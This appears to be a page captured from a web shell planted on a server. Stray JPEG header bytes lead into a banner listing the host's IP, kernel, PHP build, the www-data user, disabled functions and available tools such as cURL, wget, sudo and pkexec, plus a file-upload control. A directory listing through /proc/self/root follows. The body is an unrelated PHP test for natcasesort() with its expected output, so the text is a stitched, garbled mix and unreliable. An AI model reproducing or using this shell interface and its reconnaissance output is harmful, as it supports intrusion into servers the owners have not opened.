????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.222.57.238 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/ext/standard/tests/array/ |
Upload File : |
--TEST-- Test natcasesort() function : usage variations - different string types --SKIPIF-- <?php if (substr(PHP_OS, 0, 3) == 'WIN') { die("skip Output tested contains chars that are not shown the same on windows concole (ESC and co)"); } --FILE-- <?php /* Prototype : bool natcasesort(array &$array_arg) * Description: Sort an array using case-insensitive natural sort * Source code: ext/standard/array.c */ /* * Pass arrays of string data to see how natcasesort() re-orders the array */ echo "*** Testing natcasesort() : usage variation ***\n"; $inputs = array ( // group of escape sequences array(null, NULL, "\a", "\cx", "\e", "\f", "\n", "\t", "\xhh", "\ddd", "\v"), // array contains combination of capital/small letters array("lemoN", "Orange", "banana", "apple", "Test", "TTTT", "ttt", "ww", "x", "X", "oraNGe", "BANANA") ); foreach ($inputs as $array_arg) { var_dump( natcasesort($array_arg) ); var_dump($array_arg); } echo "Done"; ?> --EXPECTF-- *** Testing natcasesort() : usage variation *** bool(true) array(11) { [0]=> NULL [1]=> NULL [6]=> string(1) " " [10]=> string(1) "" [7]=> string(1) " " [5]=> string(1) "" [4]=> string(1) "" [2]=> string(2) "\a" [3]=> string(3) "\cx" [9]=> string(4) "\ddd" [8]=> string(4) "\xhh" } bool(true) array(12) { [3]=> string(5) "apple" [11]=> string(6) "BANANA" [2]=> string(6) "banana" [0]=> string(5) "lemoN" [10]=> string(6) "oraNGe" [1]=> string(6) "Orange" [4]=> string(4) "Test" [6]=> string(3) "ttt" [5]=> string(4) "TTTT" [7]=> string(2) "ww" [8]=> string(1) "x" [9]=> string(1) "X" } Done